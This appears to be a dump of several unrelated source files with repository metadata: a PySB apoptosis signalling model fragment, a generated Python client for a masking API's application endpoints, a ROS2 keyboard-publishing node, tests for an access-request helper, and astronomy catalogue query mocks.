Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
# Reaction rules (auto-exported; do not hand-edit the patterns).
# Ligand -> receptor -> Fadd -> C8 activation:
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
# C8-mediated Bid truncation:
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None) + BidU(C8A=None) | C8A(BidU=1) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1) % BidU(C8A=1) >> C8A(BidU=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
# Apoptosome assembly and C3 activation / inhibition / Parp cleavage:
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
Rule('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex', ApafA() + C9() | Apop(C3pro=None, Xiap=None), conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf, conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr)
Rule('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=None, Xiap=None) + C3pro(Apop=None) | Apop(C3pro=1, Xiap=None) % C3pro(Apop=1), catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf, catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr)
Rule('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product', Apop(C3pro=1, Xiap=None) % C3pro(Apop=1) >> Apop(C3pro=None, Xiap=None) + C3A(Xiap=None, ParpU=None), catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc)
Rule('inhibition_0_Xiap_inhibitor_Apop_inh_target', Xiap(Apop=None, C3A=None) + Apop(C3pro=None, Xiap=None) | Xiap(Apop=1, C3A=None) % Apop(C3pro=None, Xiap=1), inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf, inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr)
Rule('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=None) + C3A(Xiap=None, ParpU=None) | Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None), catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf, catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr)
Rule('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product', Xiap(Apop=None, C3A=1) % C3A(Xiap=1, ParpU=None) >> Xiap(Apop=None, C3A=None) + C3ub(), catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc)
Rule('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=None) + ParpU(C3A=None) | C3A(Xiap=None, ParpU=1) % ParpU(C3A=1), catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf, catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr)
Rule('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product', C3A(Xiap=None, ParpU=1) % ParpU(C3A=1) >> C3A(Xiap=None, ParpU=None) + ParpC(), catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc)
# Mitochondrial branch: Bid translocation, Bax activation, pore assembly,
# and cytochrome-c transport through the tetrameric pore:
Rule('equilibration_0_BidT_equil_a_BidM_equil_b', BidT() | BidM(BaxM=None), equilibration_0_BidT_equil_a_BidM_equil_b_1kf, equilibration_0_BidT_equil_a_BidM_equil_b_1kr)
Rule('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=None) + BaxM(BidM=None, BaxA=None) | BidM(BaxM=1) % BaxM(BidM=1, BaxA=None), catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf, catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr)
Rule('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product', BidM(BaxM=1) % BaxM(BidM=1, BaxA=None) >> BidM(BaxM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc)
Rule('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxM(BidM=None, BaxA=None) | BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1), self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf, self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr)
Rule('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate', BaxA(BaxM=1, BaxA_1=None, BaxA_2=None, CytoCM=None) % BaxM(BidM=None, BaxA=1) >> BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc)
Rule('pore_formation_0_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None), pore_formation_0_BaxA_pore_2kf, pore_formation_0_BaxA_pore_1kr)
Rule('pore_formation_1_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=None, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=None, CytoCM=None) | BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None), pore_formation_1_BaxA_pore_2kf, pore_formation_1_BaxA_pore_1kr)
Rule('pore_formation_2_BaxA_pore', BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None) + BaxA(BaxM=None, BaxA_1=3, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None), pore_formation_2_BaxA_pore_2kf, pore_formation_2_BaxA_pore_1kr)
Rule('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCM(BaxA=None) | BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5), transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf, transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr)
Rule('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C', BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=5) % CytoCM(BaxA=5) >> BaxA(BaxM=None, BaxA_1=4, BaxA_2=1, CytoCM=None) % BaxA(BaxM=None, BaxA_1=1, BaxA_2=2, CytoCM=None) % BaxA(BaxM=None, BaxA_1=2, BaxA_2=3, CytoCM=None) % BaxA(BaxM=None, BaxA_1=3, BaxA_2=4, CytoCM=None) + CytoCC(), transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc)
# Initial conditions: seed each species (all binding sites free) with the
# matching *_0 amount parameter defined above.
Initial(Ligand(Receptor=None), Ligand_0)
Initial(ParpU(C3A=None), ParpU_0)
Initial(C8A(BidU=None), C8A_0)
Initial(BaxM(BidM=None, BaxA=None), BaxM_0)
Initial(Apop(C3pro=None, Xiap=None), Apop_0)
Initial(Fadd(Receptor=None, C8pro=None), Fadd_0)
Initial(ParpC(), ParpC_0)
Initial(Xiap(Apop=None, C3A=None), Xiap_0)
Initial(C9(), C9_0)
Initial(C3ub(), C3ub_0)
Initial(C8pro(Fadd=None), C8pro_0)
Initial(C3pro(Apop=None), C3pro_0)
Initial(CytoCM(BaxA=None), CytoCM_0)
Initial(CytoCC(), CytoCC_0)
Initial(BaxA(BaxM=None, BaxA_1=None, BaxA_2=None, CytoCM=None), BaxA_0)
Initial(ApafI(), ApafI_0)
Initial(BidU(C8A=None), BidU_0)
Initial(BidT(), BidT_0)
Initial(C3A(Xiap=None, ParpU=None), C3A_0)
Initial(ApafA(), ApafA_0)
Initial(BidM(BaxM=None), BidM_0)
Initial(Receptor(Ligand=None, Fadd=None), Receptor_0)
f1b82185af4b277720b92d0f1200c1bacbf8b5ea | 15,772 | py | Python | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 5 | 2018-08-23T15:47:05.000Z | 2022-01-19T23:38:18.000Z | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 59 | 2018-10-15T10:37:00.000Z | 2022-03-22T20:49:25.000Z | dxm/lib/masking_api/api/application_api.py | experiortec/dxm-toolkit | b2ab6189e163c62fa8d7251cd533d2a36430d44a | [
"Apache-2.0"
] | 12 | 2019-03-08T19:59:13.000Z | 2021-12-16T03:28:04.000Z | # coding: utf-8
"""
Masking API
Schema for the Masking Engine API # noqa: E501
OpenAPI spec version: 5.1.8
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dxm.lib.masking_api.api_client import ApiClient
class ApplicationApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_application(self, body, **kwargs): # noqa: E501
"""Create application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application body: The application to create (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_application_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_application_with_http_info(body, **kwargs) # noqa: E501
return data
def create_application_with_http_info(self, body, **kwargs): # noqa: E501
"""Create application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_application_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Application body: The application to create (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in params or
params['body'] is None): # noqa: E501
raise ValueError("Missing the required parameter `body` when calling `create_application`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/applications', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_application(self, application_id, **kwargs):  # noqa: E501
    """Delete application by ID.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead and call ``.get()`` on it for the result.

    >>> thread = api.delete_application(application_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int application_id: The ID of the application to delete (required)
    :return: None
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always wants only the deserialized data,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # In async mode the delegate already returns the request thread; in
    # sync mode it returns the response data. Either way the delegate's
    # return value is exactly what the caller should receive.
    outcome = self.delete_application_with_http_info(application_id, **kwargs)  # noqa: E501
    return outcome
# Build and dispatch a DELETE /applications/{applicationId} request,
# returning the full HTTP response information. Auto-generated OpenAPI
# client method: validates keyword arguments, fills the path parameter,
# and delegates the HTTP call to ApiClient.call_api.
def delete_application_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Delete application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_application_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
# Whitelist of keyword arguments accepted by this endpoint.
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
# NOTE: locals() is captured deliberately at this exact point; adding or
# renaming any local variable above this line would change `params`.
params = locals()
# Reject unknown keyword arguments; merge accepted ones into `params`.
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_application" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if self.api_client.client_side_validation and ('application_id' not in params or
params['application_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `application_id` when calling `delete_application`") # noqa: E501
# Request assembly: the application ID travels as the {applicationId}
# path parameter; there is no query string or request body.
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['applicationId'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
# Delegate the HTTP call to the API client; response_type=None because a
# successful delete carries no response payload.
return self.api_client.call_api(
'/applications/{applicationId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_all_applications(self, **kwargs):  # noqa: E501
    """Get all applications.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead and call ``.get()`` on it for the result.

    >>> thread = api.get_all_applications(async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int page_number: The page number for which to get applications. This will default to the first page if excluded
    :param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
    :return: ApplicationList
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always wants only the deserialized data,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the request thread in async mode and the
    # response data in sync mode; pass its result straight through.
    outcome = self.get_all_applications_with_http_info(**kwargs)  # noqa: E501
    return outcome
# Build and dispatch a GET /applications request, returning the full HTTP
# response information. Auto-generated OpenAPI client method: validates
# keyword arguments, maps the optional pagination arguments to query
# parameters, and delegates the HTTP call to ApiClient.call_api.
def get_all_applications_with_http_info(self, **kwargs): # noqa: E501
"""Get all applications # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_applications_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_number: The page number for which to get applications. This will default to the first page if excluded
:param int page_size: The maximum number of objects to return. This will default to the DEFAULT_API_PAGE_SIZE property if not provided
:return: ApplicationList
If the method is called asynchronously,
returns the request thread.
"""
# Whitelist of keyword arguments accepted by this endpoint; both
# pagination parameters are optional, so no required-argument check.
all_params = ['page_number', 'page_size'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
# NOTE: locals() is captured deliberately at this exact point; adding or
# renaming any local variable above this line would change `params`.
params = locals()
# Reject unknown keyword arguments; merge accepted ones into `params`.
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_applications" % key
)
params[key] = val
del params['kwargs']
# Request assembly: pagination arguments, when supplied, become query
# string parameters; there are no path parameters and no body.
collection_formats = {}
path_params = {}
query_params = []
if 'page_number' in params:
query_params.append(('page_number', params['page_number'])) # noqa: E501
if 'page_size' in params:
query_params.append(('page_size', params['page_size'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
# Delegate the HTTP call to the API client; the response deserializes
# into an ApplicationList model.
return self.api_client.call_api(
'/applications', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ApplicationList', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_application_by_id(self, application_id, **kwargs):  # noqa: E501
    """Get application by ID.  # noqa: E501

    Synchronous by default; pass ``async_req=True`` to receive the
    request thread instead and call ``.get()`` on it for the result.

    >>> thread = api.get_application_by_id(application_id, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int application_id: The ID of the application to get (required)
    :return: Application
        If the method is called asynchronously,
        returns the request thread.
    """
    # This convenience wrapper always wants only the deserialized data,
    # never the (data, status, headers) triple.
    kwargs['_return_http_data_only'] = True
    # The delegate returns the request thread in async mode and the
    # response data in sync mode; pass its result straight through.
    outcome = self.get_application_by_id_with_http_info(application_id, **kwargs)  # noqa: E501
    return outcome
# Build and dispatch a GET /applications/{applicationId} request,
# returning the full HTTP response information. Auto-generated OpenAPI
# client method: validates keyword arguments, fills the path parameter,
# and delegates the HTTP call to ApiClient.call_api.
def get_application_by_id_with_http_info(self, application_id, **kwargs): # noqa: E501
"""Get application by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_application_by_id_with_http_info(application_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int application_id: The ID of the application to get (required)
:return: Application
If the method is called asynchronously,
returns the request thread.
"""
# Whitelist of keyword arguments accepted by this endpoint.
all_params = ['application_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
# NOTE: locals() is captured deliberately at this exact point; adding or
# renaming any local variable above this line would change `params`.
params = locals()
# Reject unknown keyword arguments; merge accepted ones into `params`.
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_application_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'application_id' is set
if self.api_client.client_side_validation and ('application_id' not in params or
params['application_id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `application_id` when calling `get_application_by_id`") # noqa: E501
# Request assembly: the application ID travels as the {applicationId}
# path parameter; there is no query string or request body.
collection_formats = {}
path_params = {}
if 'application_id' in params:
path_params['applicationId'] = params['application_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
# Delegate the HTTP call to the API client; the response deserializes
# into an Application model.
return self.api_client.call_api(
'/applications/{applicationId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Application', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
| 38.751843 | 142 | 0.614063 |
ff8fc6aabd9e97f8734da3a7af645921ec9e3f9e | 1,110 | py | Python | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | 1 | 2022-02-02T07:50:55.000Z | 2022-02-02T07:50:55.000Z | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | null | null | null | oreilly_ws/src/teleopbot/teleopbot/keyboard_driver.py | brand25/ros2_tuto | 9fc1dd4f130baa5ad6376227ea6869549b09e66c | [
"Apache-2.0"
] | null | null | null | import sys, select, tty, termios
import rclpy
from rclpy.node import Node
from rclpy.qos import QoSProfile
from std_msgs.msg import String
class KeyboardDriver(Node):
def __init__(self):
super().__init__('keyboard_driver')
self._key_pub = self.create_publisher(String, 'keys', QoSProfile(depth=10))
self._timer = self.create_timer(0.01, self.timer_callback)
print("Publishing keystrokes. Press Ctrl-C to exit...")
def timer_callback(self):
if select.select([sys.stdin], [], [], 0)[0] == [sys.stdin]:
msg = String()
msg.data = sys.stdin.read(1)
self._key_pub.publish(msg)
def main(args=None):
old_attr = termios.tcgetattr(sys.stdin)
tty.setcbreak(sys.stdin.fileno())
try:
rclpy.init(args=args)
keyboard_driver = KeyboardDriver()
rclpy.spin(keyboard_driver)
keyboard_driver.destroy_node()
rclpy.shutdown()
except Exception as e:
print(e)
finally:
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, old_attr)
if __name__ == '__main__':
main()
| 27.073171 | 83 | 0.646847 |
447b2bfb7e1975e6b7c2bc8ec423dc8ffac76fbe | 2,836 | py | Python | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 106 | 2015-03-30T14:15:15.000Z | 2021-07-26T07:30:11.000Z | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 547 | 2015-04-13T09:58:50.000Z | 2021-01-26T11:20:35.000Z | tests/test_stups/test_piu.py | mschwitalla/senza | 301a43fde41db194cbb80c68271692d1fe2212db | [
"Apache-2.0"
] | 102 | 2015-04-01T08:09:53.000Z | 2020-11-05T09:05:28.000Z | from unittest.mock import MagicMock
import pytest
from senza.exceptions import PiuNotFound
from senza.stups.piu import Piu
def test_request_access(monkeypatch):
m_call = MagicMock()
monkeypatch.setattr('senza.stups.piu.call', m_call)
Piu.request_access('127.0.0.1', 'no reason', None, True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect'])
m_call.reset_mock()
Piu.request_access('127.0.0.1', 'no reason', None, False)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza'])
m_call.reset_mock()
Piu.request_access('127.0.0.1', 'no reason', 'example.com', True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect',
'-O', 'example.com'])
def test_find_odd_host(monkeypatch):
m_client = MagicMock()
m_client.return_value = m_client
hosted_zone1 = {'Config': {'PrivateZone': False},
'CallerReference': '0000',
'ResourceRecordSetCount': 42,
'Id': '/hostedzone/random1',
'Name': 'example.com.'}
mock_records = [{'Name': 'odd-eu-west-1.example.com.',
'ResourceRecords': [{'Value': '127.0.0.1'}],
'TTL': 600,
'Type': 'A'}
]
m_client.list_hosted_zones.return_value = {'MaxItems': '100',
'ResponseMetadata': {
'HTTPStatusCode': 200,
'RequestId': 'FakeId'},
'HostedZones': [hosted_zone1],
'IsTcallcated': False}
m_client.list_resource_record_sets.return_value = {
"ResourceRecordSets": mock_records}
monkeypatch.setattr('boto3.client', m_client)
odd_host = Piu.find_odd_host('eu-west-1')
assert odd_host == 'odd-eu-west-1.example.com'
no_odd_host = Piu.find_odd_host('moon-crater-1')
assert no_odd_host is None
def test_request_access_not_installed(monkeypatch):
m_call = MagicMock()
m_call.side_effect = FileNotFoundError
monkeypatch.setattr('senza.stups.piu.call', m_call)
with pytest.raises(PiuNotFound):
Piu.request_access('127.0.0.1', 'no reason', None, True)
m_call.assert_called_once_with(['piu', 'request-access',
'127.0.0.1', 'no reason via senza',
'--connect'])
| 40.514286 | 77 | 0.52433 |
c918ef008f35488d5f6b858412d5f292e543dd33 | 2,976 | py | Python | astrosource/test/mocks.py | zemogle/autovar | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 1 | 2019-01-28T13:35:39.000Z | 2019-01-28T13:35:39.000Z | astrosource/test/mocks.py | zemogle/astrosource | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 14 | 2019-10-28T13:09:32.000Z | 2022-02-10T22:43:03.000Z | astrosource/test/mocks.py | zemogle/autovar | d495a336c0559097f566c2ce3f6136645f29ed62 | [
"MIT"
] | 3 | 2019-09-27T11:16:14.000Z | 2021-02-07T23:10:19.000Z | from unittest.mock import MagicMock
from astropy.table import Table, Column
import numpy as np
def create_table_cols():
mag = Column(np.array([12.33699989,12.03499985,11.31900024,12.20699978,11.48400021,11.88599968,12.09300041], dtype=np.float32))
emag = Column(np.array([0.025,0.021,0.025,0.035,0.022,0.027,0.015], dtype=np.float32))
return mag, emag
def create_coords():
ra = np.array([163.096971,163.1466597,163.159242,163.197136,163.4236044,163.3569756,163.3740879])
dec = np.array([-49.8792031,-49.8609692,-50.0239071,-49.8522255,-49.8430644,-49.9384119,-50.0038352])
return ra, dec
def mock_vizier_query_region(*args, **kwargs):
ra, dec = create_coords()
return Table([ra, dec], names=('RAJ2000', 'DEJ2000'), dtype=('float64', 'float64'))
def mock_vizier_query_region_sdss(*args, **kwargs):
ra, dec = create_coords()
return Table([ra, dec], names=('RA_ICRS', 'DE_ICRS'), dtype=('float64', 'float64'))
def mock_vizier_query_region_vsx(*args, **kwargs):
t = mock_vizier_query_region()
q = {'B/vsx/vsx' : t }
return q
def mock_vizier_query_region_apass_b(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
t.add_column(m, name='Bmag')
t.add_column(e, name='e_Bmag')
t.add_column(m, name='Vmag')
t.add_column(e, name='e_Vmag')
q = {'II/336/apass9' : t }
return q
def mock_vizier_query_region_apass_v(*args, **kwargs):
t = mock_vizier_query_region()
m,e = create_table_cols()
t.add_column(m, name='Vmag')
t.add_column(e, name='e_Vmag')
